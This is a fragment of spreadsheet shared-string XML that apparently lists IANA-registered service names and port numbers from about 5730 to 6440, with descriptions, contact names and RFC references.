  <si>
    <t>openmail</t>
  </si>
  <si>
    <t>Openmail User Agent Layer</t>
  </si>
  <si>
    <t>[OpenMail_Encyclopedi][Don_Loughry]</t>
  </si>
  <si>
    <t>unieng</t>
  </si>
  <si>
    <t>Steltor's calendar access</t>
  </si>
  <si>
    <t>[Bernard_Desruisseaux]</t>
  </si>
  <si>
    <t>5731-5740</t>
  </si>
  <si>
    <t>ida-discover1</t>
  </si>
  <si>
    <t>IDA Discover Port 1</t>
  </si>
  <si>
    <t>[MPITech_Support]</t>
  </si>
  <si>
    <t>ida-discover2</t>
  </si>
  <si>
    <t>IDA Discover Port 2</t>
  </si>
  <si>
    <t>watchdoc-pod</t>
  </si>
  <si>
    <t>Watchdoc NetPOD Protocol</t>
  </si>
  <si>
    <t>[Christophe_Chevalier]</t>
  </si>
  <si>
    <t>watchdoc</t>
  </si>
  <si>
    <t>Watchdoc Server</t>
  </si>
  <si>
    <t>fcopy-server</t>
  </si>
  <si>
    <t>[Moshe_Leibovitch]</t>
  </si>
  <si>
    <t>fcopys-server</t>
  </si>
  <si>
    <t>tunatic</t>
  </si>
  <si>
    <t>Wildbits Tunatic</t>
  </si>
  <si>
    <t>[Sylvain_Demongeot]</t>
  </si>
  <si>
    <t>tunalyzer</t>
  </si>
  <si>
    <t>Wildbits Tunalyzer</t>
  </si>
  <si>
    <t>rscd</t>
  </si>
  <si>
    <t>Bladelogic Agent Service</t>
  </si>
  <si>
    <t>[Brian_Trevor]</t>
  </si>
  <si>
    <t>5751-5754</t>
  </si>
  <si>
    <t>openmailg</t>
  </si>
  <si>
    <t>OpenMail Desk Gateway server</t>
  </si>
  <si>
    <t>x500ms</t>
  </si>
  <si>
    <t>OpenMail X.500 Directory Server</t>
  </si>
  <si>
    <t>5758-5765</t>
  </si>
  <si>
    <t>openmailns</t>
  </si>
  <si>
    <t>OpenMail NewMail Server</t>
  </si>
  <si>
    <t>s-openmail</t>
  </si>
  <si>
    <t>OpenMail Suer Agent Layer (Secure)</t>
  </si>
  <si>
    <t>openmailpxy</t>
  </si>
  <si>
    <t>OpenMail CMTS Server</t>
  </si>
  <si>
    <t>spramsca</t>
  </si>
  <si>
    <t>x509solutions Internal CA</t>
  </si>
  <si>
    <t>[Brendan_Fay]</t>
  </si>
  <si>
    <t>spramsd</t>
  </si>
  <si>
    <t>x509solutions Secure Data</t>
  </si>
  <si>
    <t>netagent</t>
  </si>
  <si>
    <t>NetAgent</t>
  </si>
  <si>
    <t>[Bradley_Birnbaum]</t>
  </si>
  <si>
    <t>5772-5776</t>
  </si>
  <si>
    <t>dali-port</t>
  </si>
  <si>
    <t>DALI Port</t>
  </si>
  <si>
    <t>[Wayne_Morrow][Michael_Melio]</t>
  </si>
  <si>
    <t>5778-5779</t>
  </si>
  <si>
    <t>vts-rpc</t>
  </si>
  <si>
    <t>Visual Tag System RPC</t>
  </si>
  <si>
    <t>[Graham_Bloice]</t>
  </si>
  <si>
    <t>3par-evts</t>
  </si>
  <si>
    <t>3PAR Event Reporting Service</t>
  </si>
  <si>
    <t>[Sushil_Thomas]</t>
  </si>
  <si>
    <t>3par-mgmt</t>
  </si>
  <si>
    <t>3PAR Management Service</t>
  </si>
  <si>
    <t>[Don_Marselle]</t>
  </si>
  <si>
    <t>3par-mgmt-ssl</t>
  </si>
  <si>
    <t>3PAR Management Service with SSL</t>
  </si>
  <si>
    <t>ibar</t>
  </si>
  <si>
    <t>Cisco Interbox Application Redundancy</t>
  </si>
  <si>
    <t>[Cullen_Jennings]</t>
  </si>
  <si>
    <t>3par-rcopy</t>
  </si>
  <si>
    <t>3PAR Inform Remote Copy</t>
  </si>
  <si>
    <t>cisco-redu</t>
  </si>
  <si>
    <t>redundancy notification</t>
  </si>
  <si>
    <t>[Ming_Zhang]</t>
  </si>
  <si>
    <t>waascluster</t>
  </si>
  <si>
    <t>Cisco WAAS Cluster Protocol</t>
  </si>
  <si>
    <t>[Winston_Chou]</t>
  </si>
  <si>
    <t>5788-5792</t>
  </si>
  <si>
    <t>xtreamx</t>
  </si>
  <si>
    <t>XtreamX Supervised Peer message</t>
  </si>
  <si>
    <t>[Ahmad_Tajuddin_Samsu]</t>
  </si>
  <si>
    <t>spdp</t>
  </si>
  <si>
    <t>Simple Peered Discovery Protocol</t>
  </si>
  <si>
    <t>[Dave_Lindquist]</t>
  </si>
  <si>
    <t>5795-5812</t>
  </si>
  <si>
    <t>icmpd</t>
  </si>
  <si>
    <t>ICMPD</t>
  </si>
  <si>
    <t>[Shane_O_Donnell]</t>
  </si>
  <si>
    <t>spt-automation</t>
  </si>
  <si>
    <t>Support Automation</t>
  </si>
  <si>
    <t>[Joshua_Hawkins]</t>
  </si>
  <si>
    <t>5815-5840</t>
  </si>
  <si>
    <t>shiprush-d-ch</t>
  </si>
  <si>
    <t>Z-firm ShipRush interface for web access and bidirectional data</t>
  </si>
  <si>
    <t>reversion</t>
  </si>
  <si>
    <t>Reversion Backup/Restore</t>
  </si>
  <si>
    <t>[Cameo_Systems_Inc]</t>
  </si>
  <si>
    <t>[Craig_Nelson]</t>
  </si>
  <si>
    <t>5843-5858</t>
  </si>
  <si>
    <t>wherehoo</t>
  </si>
  <si>
    <t>WHEREHOO</t>
  </si>
  <si>
    <t>[Jim_Youll]</t>
  </si>
  <si>
    <t>5860-5862</t>
  </si>
  <si>
    <t>ppsuitemsg</t>
  </si>
  <si>
    <t>PlanetPress Suite Messeng</t>
  </si>
  <si>
    <t>[Yannick_Fortin]</t>
  </si>
  <si>
    <t>5864-5867</t>
  </si>
  <si>
    <t>diameters</t>
  </si>
  <si>
    <t>Diameter over TLS/TCP</t>
  </si>
  <si>
    <t>[RFC6733]</t>
  </si>
  <si>
    <t>Diameter over DTLS/SCTP</t>
  </si>
  <si>
    <t>5869-5882</t>
  </si>
  <si>
    <t>jute</t>
  </si>
  <si>
    <t>Javascript Unit Test Environment</t>
  </si>
  <si>
    <t>[Mark_Ethan_Trostler]</t>
  </si>
  <si>
    <t>5884-5899</t>
  </si>
  <si>
    <t>rfb</t>
  </si>
  <si>
    <t>Remote Framebuffer</t>
  </si>
  <si>
    <t>[Tristan_Richardson]</t>
  </si>
  <si>
    <t>[RFC6143]</t>
  </si>
  <si>
    <t>5901-5909</t>
  </si>
  <si>
    <t>cm</t>
  </si>
  <si>
    <t>Context Management</t>
  </si>
  <si>
    <t>[Eivan_Cerasi]</t>
  </si>
  <si>
    <t>[Justin_Yu]</t>
  </si>
  <si>
    <t>cpdlc</t>
  </si>
  <si>
    <t>Controller Pilot Data Link Communication</t>
  </si>
  <si>
    <t>fis</t>
  </si>
  <si>
    <t>Flight Information Services</t>
  </si>
  <si>
    <t>ads-c</t>
  </si>
  <si>
    <t>Automatic Dependent Surveillance</t>
  </si>
  <si>
    <t>5914-5962</t>
  </si>
  <si>
    <t>indy</t>
  </si>
  <si>
    <t>Indy Application Server</t>
  </si>
  <si>
    <t>[Bjorn_Lantz]</t>
  </si>
  <si>
    <t>5964-5967</t>
  </si>
  <si>
    <t>mppolicy-v5</t>
  </si>
  <si>
    <t>[Yutaka_Ono]</t>
  </si>
  <si>
    <t>mppolicy-mgr</t>
  </si>
  <si>
    <t>5970-5983</t>
  </si>
  <si>
    <t>couchdb</t>
  </si>
  <si>
    <t>CouchDB</t>
  </si>
  <si>
    <t>[Noah_Slater]</t>
  </si>
  <si>
    <t>wsman</t>
  </si>
  <si>
    <t>WBEM WS-Management HTTP</t>
  </si>
  <si>
    <t>wsmans</t>
  </si>
  <si>
    <t>WBEM WS-Management HTTP over TLS/SSL</t>
  </si>
  <si>
    <t>wbem-rmi</t>
  </si>
  <si>
    <t>WBEM RMI</t>
  </si>
  <si>
    <t>wbem-http</t>
  </si>
  <si>
    <t>WBEM CIM-XML (HTTP)</t>
  </si>
  <si>
    <t>wbem-https</t>
  </si>
  <si>
    <t>WBEM CIM-XML (HTTPS)</t>
  </si>
  <si>
    <t>wbem-exp-https</t>
  </si>
  <si>
    <t>WBEM Export HTTPS</t>
  </si>
  <si>
    <t>[Denise_Eckstein]</t>
  </si>
  <si>
    <t>nuxsl</t>
  </si>
  <si>
    <t>NUXSL</t>
  </si>
  <si>
    <t>[Kai_Kretschmann]</t>
  </si>
  <si>
    <t>consul-insight</t>
  </si>
  <si>
    <t>Consul InSight Security</t>
  </si>
  <si>
    <t>[Arthur_Hillenaar]</t>
  </si>
  <si>
    <t>cim-rs</t>
  </si>
  <si>
    <t>DMTF WBEM CIM REST</t>
  </si>
  <si>
    <t>[WS_Inc]</t>
  </si>
  <si>
    <t>[Jim_Davis_2]</t>
  </si>
  <si>
    <t>5994-5998</t>
  </si>
  <si>
    <t>cvsup</t>
  </si>
  <si>
    <t>CVSup</t>
  </si>
  <si>
    <t>[Randall_Atkinson_2]</t>
  </si>
  <si>
    <t>x11</t>
  </si>
  <si>
    <t>6000-6063</t>
  </si>
  <si>
    <t>X Window System</t>
  </si>
  <si>
    <t>[Stephen_Gildea]</t>
  </si>
  <si>
    <t>Known Unauthorized Use on port 6003</t>
  </si>
  <si>
    <t>ndl-ahp-svc</t>
  </si>
  <si>
    <t>NDL-AHP-SVC</t>
  </si>
  <si>
    <t>[John_Richmond_2]</t>
  </si>
  <si>
    <t>winpharaoh</t>
  </si>
  <si>
    <t>WinPharaoh</t>
  </si>
  <si>
    <t>[Basil_Lee]</t>
  </si>
  <si>
    <t>ewctsp</t>
  </si>
  <si>
    <t>EWCTSP</t>
  </si>
  <si>
    <t>[Mark_Bailon]</t>
  </si>
  <si>
    <t>gsmp-ancp</t>
  </si>
  <si>
    <t>GSMP/ANCP</t>
  </si>
  <si>
    <t>[Avri_Doria]</t>
  </si>
  <si>
    <t>[RFC6320]</t>
  </si>
  <si>
    <t>trip</t>
  </si>
  <si>
    <t>TRIP</t>
  </si>
  <si>
    <t>[Hussein_F_Salama]</t>
  </si>
  <si>
    <t>messageasap</t>
  </si>
  <si>
    <t>Messageasap</t>
  </si>
  <si>
    <t>[Murray_Freeman]</t>
  </si>
  <si>
    <t>ssdtp</t>
  </si>
  <si>
    <t>SSDTP</t>
  </si>
  <si>
    <t>[Michael_Shearson_2]</t>
  </si>
  <si>
    <t>diagnose-proc</t>
  </si>
  <si>
    <t>DIAGNOSE-PROC</t>
  </si>
  <si>
    <t>[Allan_Miller]</t>
  </si>
  <si>
    <t>directplay8</t>
  </si>
  <si>
    <t>DirectPlay8</t>
  </si>
  <si>
    <t>[John_Kane]</t>
  </si>
  <si>
    <t>max</t>
  </si>
  <si>
    <t>Microsoft Max</t>
  </si>
  <si>
    <t>[Jay_Beavers]</t>
  </si>
  <si>
    <t>dpm-acm</t>
  </si>
  <si>
    <t>Microsoft DPM Access Control Manager</t>
  </si>
  <si>
    <t>[Prabu_Ambravaneswara]</t>
  </si>
  <si>
    <t>msft-dpm-cert</t>
  </si>
  <si>
    <t>Microsoft DPM WCF Certificates</t>
  </si>
  <si>
    <t>[Microsoft_Corporation]</t>
  </si>
  <si>
    <t>[Prateek_Sharma]</t>
  </si>
  <si>
    <t>iconstructsrv</t>
  </si>
  <si>
    <t>iConstruct Server</t>
  </si>
  <si>
    <t>[iConstruct_Aus_Pty_Ltd]</t>
  </si>
  <si>
    <t>[Afshin_Jafari]</t>
  </si>
  <si>
    <t>6078-6079</t>
  </si>
  <si>
    <t>gue</t>
  </si>
  <si>
    <t>Generic UDP Encapsulation</t>
  </si>
  <si>
    <t>[Tom_Herbert]</t>
  </si>
  <si>
    <t>[draft-herbert-gue]</t>
  </si>
  <si>
    <t>geneve</t>
  </si>
  <si>
    <t>Generic Network Virtualization Encapsulation (Geneve)</t>
  </si>
  <si>
    <t>[RFC-ietf-nvo3-geneve-16]</t>
  </si>
  <si>
    <t>p25cai</t>
  </si>
  <si>
    <t>APCO Project 25 Common Air Interface - UDP encapsulation</t>
  </si>
  <si>
    <t>[APCO_Project]</t>
  </si>
  <si>
    <t>miami-bcast</t>
  </si>
  <si>
    <t>telecomsoftware miami broadcast</t>
  </si>
  <si>
    <t>[Peter_Steiner]</t>
  </si>
  <si>
    <t>reload-config</t>
  </si>
  <si>
    <t>Peer to Peer Infrastructure Configuration</t>
  </si>
  <si>
    <t>[RFC6940]</t>
  </si>
  <si>
    <t>konspire2b</t>
  </si>
  <si>
    <t>konspire2b p2p network</t>
  </si>
  <si>
    <t>[Jason_Rohrer]</t>
  </si>
  <si>
    <t>pdtp</t>
  </si>
  <si>
    <t>PDTP P2P</t>
  </si>
  <si>
    <t>[Tony_Arcieri]</t>
  </si>
  <si>
    <t>ldss</t>
  </si>
  <si>
    <t>Local Download Sharing Service</t>
  </si>
  <si>
    <t>[Clifford_Heath]</t>
  </si>
  <si>
    <t>doglms</t>
  </si>
  <si>
    <t>SuperDog License Manager</t>
  </si>
  <si>
    <t>[SafeNet]</t>
  </si>
  <si>
    <t>[Rob_Tao]</t>
  </si>
  <si>
    <t>doglms-notify</t>
  </si>
  <si>
    <t>SuperDog License Manager Notifier</t>
  </si>
  <si>
    <t>6089-6098</t>
  </si>
  <si>
    <t>raxa-mgmt</t>
  </si>
  <si>
    <t>RAXA Management</t>
  </si>
  <si>
    <t>[Sukanta_Ganguly]</t>
  </si>
  <si>
    <t>synchronet-db</t>
  </si>
  <si>
    <t>SynchroNet-db</t>
  </si>
  <si>
    <t>[Arne_Haugland]</t>
  </si>
  <si>
    <t>Known Unauthorized Use on port 6100</t>
  </si>
  <si>
    <t>synchronet-rtc</t>
  </si>
  <si>
    <t>SynchroNet-rtc</t>
  </si>
  <si>
    <t>synchronet-upd</t>
  </si>
  <si>
    <t>SynchroNet-upd</t>
  </si>
  <si>
    <t>rets</t>
  </si>
  <si>
    <t>RETS</t>
  </si>
  <si>
    <t>[Jeremy_Crawford]</t>
  </si>
  <si>
    <t>dbdb</t>
  </si>
  <si>
    <t>DBDB</t>
  </si>
  <si>
    <t>[Aaron_Brick]</t>
  </si>
  <si>
    <t>primaserver</t>
  </si>
  <si>
    <t>Prima Server</t>
  </si>
  <si>
    <t>[Prima_Designs_System]</t>
  </si>
  <si>
    <t>mpsserver</t>
  </si>
  <si>
    <t>MPS Server</t>
  </si>
  <si>
    <t>etc-control</t>
  </si>
  <si>
    <t>ETC Control</t>
  </si>
  <si>
    <t>[Steve_Polishinski]</t>
  </si>
  <si>
    <t>sercomm-scadmin</t>
  </si>
  <si>
    <t>Sercomm-SCAdmin</t>
  </si>
  <si>
    <t>[Melinda_Tsao_2]</t>
  </si>
  <si>
    <t>globecast-id</t>
  </si>
  <si>
    <t>GLOBECAST-ID</t>
  </si>
  <si>
    <t>softcm</t>
  </si>
  <si>
    <t>HP SoftBench CM</t>
  </si>
  <si>
    <t>[Scott_A_Kramer]</t>
  </si>
  <si>
    <t>spc</t>
  </si>
  <si>
    <t>HP SoftBench Sub-Process Control</t>
  </si>
  <si>
    <t>dtspcd</t>
  </si>
  <si>
    <t>Desk-Top Sub-Process Control Daemon</t>
  </si>
  <si>
    <t>dayliteserver</t>
  </si>
  <si>
    <t>Daylite Server</t>
  </si>
  <si>
    <t>[Brent_Gulanowski]</t>
  </si>
  <si>
    <t>wrspice</t>
  </si>
  <si>
    <t>WRspice IPC Service</t>
  </si>
  <si>
    <t>[Stephen_R_Whiteley]</t>
  </si>
  <si>
    <t>xic</t>
  </si>
  <si>
    <t>Xic IPC Service</t>
  </si>
  <si>
    <t>xtlserv</t>
  </si>
  <si>
    <t>XicTools License Manager Service</t>
  </si>
  <si>
    <t>daylitetouch</t>
  </si>
  <si>
    <t>Daylite Touch Sync</t>
  </si>
  <si>
    <t>tipc</t>
  </si>
  <si>
    <t>Transparent Inter Process Communication</t>
  </si>
  <si>
    <t>[Ericsson]</t>
  </si>
  <si>
    <t>[Erik_Hugne]</t>
  </si>
  <si>
    <t>6119-6120</t>
  </si>
  <si>
    <t>spdy</t>
  </si>
  <si>
    <t>SPDY for a faster web</t>
  </si>
  <si>
    <t>[Matthew_Lloyd]</t>
  </si>
  <si>
    <t>bex-webadmin</t>
  </si>
  <si>
    <t>Backup Express Web Server</t>
  </si>
  <si>
    <t>[Catalogic_Software_Inc]</t>
  </si>
  <si>
    <t>[Chi_Shih_Chang]</t>
  </si>
  <si>
    <t>backup-express</t>
  </si>
  <si>
    <t>Backup Express</t>
  </si>
  <si>
    <t>pnbs</t>
  </si>
  <si>
    <t>Phlexible Network Backup Service</t>
  </si>
  <si>
    <t>[William_R_Lear_2]</t>
  </si>
  <si>
    <t>6125-6129</t>
  </si>
  <si>
    <t>damewaremobgtwy</t>
  </si>
  <si>
    <t>The DameWare Mobile Gateway Service</t>
  </si>
  <si>
    <t>[SolarWinds]</t>
  </si>
  <si>
    <t>[David_Gayler]</t>
  </si>
  <si>
    <t>6131-6132</t>
  </si>
  <si>
    <t>nbt-wol</t>
  </si>
  <si>
    <t>New Boundary Tech WOL</t>
  </si>
  <si>
    <t>[Elizabeth_Zilen]</t>
  </si>
  <si>
    <t>6134-6139</t>
  </si>
  <si>
    <t>pulsonixnls</t>
  </si>
  <si>
    <t>Pulsonix Network License Service</t>
  </si>
  <si>
    <t>[David_Manns]</t>
  </si>
  <si>
    <t>meta-corp</t>
  </si>
  <si>
    <t>Meta Corporation License Manager</t>
  </si>
  <si>
    <t>[Osamu_Masuda]</t>
  </si>
  <si>
    <t>aspentec-lm</t>
  </si>
  <si>
    <t>Aspen Technology License Manager</t>
  </si>
  <si>
    <t>[Kevin_Massey]</t>
  </si>
  <si>
    <t>watershed-lm</t>
  </si>
  <si>
    <t>Watershed License Manager</t>
  </si>
  <si>
    <t>statsci1-lm</t>
  </si>
  <si>
    <t>StatSci License Manager - 1</t>
  </si>
  <si>
    <t>[Scott_Blachowicz]</t>
  </si>
  <si>
    <t>statsci2-lm</t>
  </si>
  <si>
    <t>StatSci License Manager - 2</t>
  </si>
  <si>
    <t>lonewolf-lm</t>
  </si>
  <si>
    <t>Lone Wolf Systems License Manager</t>
  </si>
  <si>
    <t>[Dan_Klein]</t>
  </si>
  <si>
    <t>montage-lm</t>
  </si>
  <si>
    <t>Montage License Manager</t>
  </si>
  <si>
    <t>[Michael_Ubell]</t>
  </si>
  <si>
    <t>[M_Flemming]</t>
  </si>
  <si>
    <t>tal-pod</t>
  </si>
  <si>
    <t>[Steven_Loomis]</t>
  </si>
  <si>
    <t>6150-6158</t>
  </si>
  <si>
    <t>efb-aci</t>
  </si>
  <si>
    <t>EFB Application Control Interface</t>
  </si>
  <si>
    <t>[Jonathan_Schaaf]</t>
  </si>
  <si>
    <t>ecmp</t>
  </si>
  <si>
    <t>Emerson Extensible Control and Management Protocol</t>
  </si>
  <si>
    <t>[Bryce_Beeston]</t>
  </si>
  <si>
    <t>ecmp-data</t>
  </si>
  <si>
    <t>Emerson Extensible Control and Management Protocol Data</t>
  </si>
  <si>
    <t>patrol-ism</t>
  </si>
  <si>
    <t>PATROL Internet Srv Mgr</t>
  </si>
  <si>
    <t>patrol-coll</t>
  </si>
  <si>
    <t>PATROL Collector</t>
  </si>
  <si>
    <t>pscribe</t>
  </si>
  <si>
    <t>Precision Scribe Cnx Port</t>
  </si>
  <si>
    <t>[Robert_W_Hodges]</t>
  </si>
  <si>
    <t>6164-6199</t>
  </si>
  <si>
    <t>lm-x</t>
  </si>
  <si>
    <t>LM-X License Manager by X-Formation</t>
  </si>
  <si>
    <t>[Henrik_Goldman]</t>
  </si>
  <si>
    <t>Known Unauthorized Use on port 6200</t>
  </si>
  <si>
    <t>thermo-calc</t>
  </si>
  <si>
    <t>Management of service nodes in a processing grid for thermodynamic calculations</t>
  </si>
  <si>
    <t>[Thermo-Calc_Software]</t>
  </si>
  <si>
    <t>[Thomas_Revesz]</t>
  </si>
  <si>
    <t>6202-6208</t>
  </si>
  <si>
    <t>qmtps</t>
  </si>
  <si>
    <t>QMTP over TLS</t>
  </si>
  <si>
    <t>[FEHCom]</t>
  </si>
  <si>
    <t>[Erwin_Hoffmann]</t>
  </si>
  <si>
    <t>6210-6221</t>
  </si>
  <si>
    <t>radmind</t>
  </si>
  <si>
    <t>Radmind Access Protocol</t>
  </si>
  <si>
    <t>[Patrick_M_McNeal]</t>
  </si>
  <si>
    <t>6223-6240</t>
  </si>
  <si>
    <t>jeol-nsdtp-1</t>
  </si>
  <si>
    <t>JEOL Network Services Data Transport Protocol 1</t>
  </si>
  <si>
    <t>[Kevin_Wellwood]</t>
  </si>
  <si>
    <t>jeol-nsddp-1</t>
  </si>
  <si>
    <t>JEOL Network Services Dynamic Discovery Protocol 1</t>
  </si>
  <si>
    <t>jeol-nsdtp-2</t>
  </si>
  <si>
    <t>JEOL Network Services Data Transport Protocol 2</t>
  </si>
  <si>
    <t>jeol-nsddp-2</t>
  </si>
  <si>
    <t>JEOL Network Services Dynamic Discovery Protocol 2</t>
  </si>
  <si>
    <t>jeol-nsdtp-3</t>
  </si>
  <si>
    <t>JEOL Network Services Data Transport Protocol 3</t>
  </si>
  <si>
    <t>jeol-nsddp-3</t>
  </si>
  <si>
    <t>JEOL Network Services Dynamic Discovery Protocol 3</t>
  </si>
  <si>
    <t>jeol-nsdtp-4</t>
  </si>
  <si>
    <t>JEOL Network Services Data Transport Protocol 4</t>
  </si>
  <si>
    <t>jeol-nsddp-4</t>
  </si>
  <si>
    <t>JEOL Network Services Dynamic Discovery Protocol 4</t>
  </si>
  <si>
    <t>6245-6250</t>
  </si>
  <si>
    <t>tl1-raw-ssl</t>
  </si>
  <si>
    <t>TL1 Raw Over SSL/TLS</t>
  </si>
  <si>
    <t>[Jim_Humphreys]</t>
  </si>
  <si>
    <t>tl1-ssh</t>
  </si>
  <si>
    <t>TL1 over SSH</t>
  </si>
  <si>
    <t>crip</t>
  </si>
  <si>
    <t>CRIP</t>
  </si>
  <si>
    <t>[Mike_Rodbell]</t>
  </si>
  <si>
    <t>6254-6266</t>
  </si>
  <si>
    <t>gld</t>
  </si>
  <si>
    <t>GridLAB-D User Interface</t>
  </si>
  <si>
    <t>[David_Chassin]</t>
  </si>
  <si>
    <t>grid</t>
  </si>
  <si>
    <t>Grid Authentication</t>
  </si>
  <si>
    <t>[Jason_Hamilton]</t>
  </si>
  <si>
    <t>grid-alt</t>
  </si>
  <si>
    <t>Grid Authentication Alt</t>
  </si>
  <si>
    <t>6270-6299</t>
  </si>
  <si>
    <t>bmc-grx</t>
  </si>
  <si>
    <t>BMC GRX</t>
  </si>
  <si>
    <t>bmc-ctd-ldap</t>
  </si>
  <si>
    <t>BMC CONTROL-D LDAP SERVER
IANA assigned this well-formed service name as a replacement for "bmc_ctd_ldap".</t>
  </si>
  <si>
    <t>[Portnoy_Boxman_2]</t>
  </si>
  <si>
    <t>bmc_ctd_ldap</t>
  </si>
  <si>
    <t>BMC CONTROL-D LDAP SERVER</t>
  </si>
  <si>
    <t>This entry is an alias to "bmc-ctd-ldap".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>6302-6305</t>
  </si>
  <si>
    <t>ufmp</t>
  </si>
  <si>
    <t>Unified Fabric Management Protocol</t>
  </si>
  <si>
    <t>[Mellanox]</t>
  </si>
  <si>
    <t>[Shachar_Dor]</t>
  </si>
  <si>
    <t>6307-6314</t>
  </si>
  <si>
    <t>scup</t>
  </si>
  <si>
    <t>Sensor Control Unit Protocol</t>
  </si>
  <si>
    <t>[Sven_Kopacz]</t>
  </si>
  <si>
    <t>scup-disc</t>
  </si>
  <si>
    <t>Sensor Control Unit Protocol Discovery Protocol</t>
  </si>
  <si>
    <t>abb-escp</t>
  </si>
  <si>
    <t>Ethernet Sensor Communications Protocol</t>
  </si>
  <si>
    <t>[Jaime_Antolin]</t>
  </si>
  <si>
    <t>nav-data-cmd</t>
  </si>
  <si>
    <t>Navtech Radar Sensor Data Command</t>
  </si>
  <si>
    <t>[Navtech_Radar_Ltd]</t>
  </si>
  <si>
    <t>[Guy_Avery]</t>
  </si>
  <si>
    <t>nav-data</t>
  </si>
  <si>
    <t>Navtech Radar Sensor Data</t>
  </si>
  <si>
    <t>6318-6319</t>
  </si>
  <si>
    <t>repsvc</t>
  </si>
  <si>
    <t>Double-Take Replication Service</t>
  </si>
  <si>
    <t>[Carbonite_Inc]</t>
  </si>
  <si>
    <t>[James_Wilkinson]</t>
  </si>
  <si>
    <t>emp-server1</t>
  </si>
  <si>
    <t>Empress Software Connectivity Server 1</t>
  </si>
  <si>
    <t>[Srdjan_Holovac]</t>
  </si>
  <si>
    <t>emp-server2</t>
  </si>
  <si>
    <t>Empress Software Connectivity Server 2</t>
  </si>
  <si>
    <t>hrd-ncs</t>
  </si>
  <si>
    <t>HR Device Network Configuration Service</t>
  </si>
  <si>
    <t>[Hall_Research]</t>
  </si>
  <si>
    <t>[Vishal_Dharmadhikari]</t>
  </si>
  <si>
    <t>hrd-ns-disc</t>
  </si>
  <si>
    <t>HR Device Network service</t>
  </si>
  <si>
    <t>dt-mgmtsvc</t>
  </si>
  <si>
    <t>Double-Take Management Service</t>
  </si>
  <si>
    <t>dt-vra</t>
  </si>
  <si>
    <t>Double-Take Virtual Recovery Assistant</t>
  </si>
  <si>
    <t>6327-6342</t>
  </si>
  <si>
    <t>sflow</t>
  </si>
  <si>
    <t>sFlow traffic monitoring</t>
  </si>
  <si>
    <t>[Peter_Phaal]</t>
  </si>
  <si>
    <t>streletz</t>
  </si>
  <si>
    <t>Argus-Spectr security and fire-prevention systems service</t>
  </si>
  <si>
    <t>[Argus_Spectr]</t>
  </si>
  <si>
    <t>[Kirill_Marinushkin]</t>
  </si>
  <si>
    <t>6345-6345</t>
  </si>
  <si>
    <t>gnutella-svc</t>
  </si>
  <si>
    <t>[Serguei_Osokine]</t>
  </si>
  <si>
    <t>gnutella-rtr</t>
  </si>
  <si>
    <t>6348-6349</t>
  </si>
  <si>
    <t>adap</t>
  </si>
  <si>
    <t>App Discovery and Access Protocol</t>
  </si>
  <si>
    <t>[Thomas_Kjoernes]</t>
  </si>
  <si>
    <t>6351-6354</t>
  </si>
  <si>
    <t>pmcs</t>
  </si>
  <si>
    <t>PMCS applications</t>
  </si>
  <si>
    <t>[Pavel_Mendl]</t>
  </si>
  <si>
    <t>6356-6359</t>
  </si>
  <si>
    <t>metaedit-mu</t>
  </si>
  <si>
    <t>MetaEdit+ Multi-User</t>
  </si>
  <si>
    <t>[Steven_Kelly]</t>
  </si>
  <si>
    <t>6361-6362</t>
  </si>
  <si>
    <t>ndn</t>
  </si>
  <si>
    <t>Named Data Networking</t>
  </si>
  <si>
    <t>[Regents_of_the_University_of_California]</t>
  </si>
  <si>
    <t>[Jeff_Burke]</t>
  </si>
  <si>
    <t>6364-6369</t>
  </si>
  <si>
    <t>metaedit-se</t>
  </si>
  <si>
    <t>MetaEdit+ Server Administration</t>
  </si>
  <si>
    <t>6371-6378</t>
  </si>
  <si>
    <t>redis</t>
  </si>
  <si>
    <t>An advanced key-value cache and store</t>
  </si>
  <si>
    <t>[Salvatore_Sanfilippo]</t>
  </si>
  <si>
    <t>[Itamar_Haber]</t>
  </si>
  <si>
    <t>6380-6381</t>
  </si>
  <si>
    <t>metatude-mds</t>
  </si>
  <si>
    <t>Metatude Dialogue Server</t>
  </si>
  <si>
    <t>[Menno_Zweistra]</t>
  </si>
  <si>
    <t>6383-6388</t>
  </si>
  <si>
    <t>clariion-evr01</t>
  </si>
  <si>
    <t>[Dave_DesRoches]</t>
  </si>
  <si>
    <t>metaedit-ws</t>
  </si>
  <si>
    <t>MetaEdit+ WebService API</t>
  </si>
  <si>
    <t>6391-6399</t>
  </si>
  <si>
    <t>boe-cms</t>
  </si>
  <si>
    <t>Business Objects CMS contact port</t>
  </si>
  <si>
    <t>[Wade_Richards]</t>
  </si>
  <si>
    <t>boe-was</t>
  </si>
  <si>
    <t>boe-eventsrv</t>
  </si>
  <si>
    <t>boe-cachesvr</t>
  </si>
  <si>
    <t>boe-filesvr</t>
  </si>
  <si>
    <t>Business Objects Enterprise internal server</t>
  </si>
  <si>
    <t>boe-pagesvr</t>
  </si>
  <si>
    <t>boe-processsvr</t>
  </si>
  <si>
    <t>boe-resssvr1</t>
  </si>
  <si>
    <t>boe-resssvr2</t>
  </si>
  <si>
    <t>boe-resssvr3</t>
  </si>
  <si>
    <t>boe-resssvr4</t>
  </si>
  <si>
    <t>6411-6416</t>
  </si>
  <si>
    <t>faxcomservice</t>
  </si>
  <si>
    <t>Faxcom Message Service</t>
  </si>
  <si>
    <t>syserverremote</t>
  </si>
  <si>
    <t>SYserver remote commands</t>
  </si>
  <si>
    <t>svdrp</t>
  </si>
  <si>
    <t>Simple VDR Protocol</t>
  </si>
  <si>
    <t>[Klaus_Schmidinger]</t>
  </si>
  <si>
    <t>svdrp-disc</t>
  </si>
  <si>
    <t>Simple VDR Protocol Discovery</t>
  </si>
  <si>
    <t>nim-vdrshell</t>
  </si>
  <si>
    <t>NIM_VDRShell</t>
  </si>
  <si>
    <t>[Rik_Ditter]</t>
  </si>
  <si>
    <t>nim-wan</t>
  </si>
  <si>
    <t>NIM_WAN</t>
  </si>
  <si>
    <t>6422-6431</t>
  </si>
  <si>
    <t>pgbouncer</t>
  </si>
  <si>
    <t>PgBouncer</t>
  </si>
  <si>
    <t>[Marko_Kreen]</t>
  </si>
  <si>
    <t>6433-6439</t>
  </si>
  <si>
    <t>heliosd</t>
  </si>
  <si>
    <t>heliosd daemon</t>
  </si>
  <si>
    <t>[Cartesian_Theatre]</t>
  </si>
  <si>
    <t>[Kip_Warner]</t>
  </si>
  <si>
    <t>tarp</t>
  </si>
  <si>
    <t>Transitory Application Request Protocol</t>
  </si>
  <si>
    <t>[Chris_Peel_2]</t>
  </si>
  <si>
    <t>sun-sr-https</t>
  </si>
  <si>
    <t>Service Registry Default HTTPS Domain</t>
  </si>
  <si>
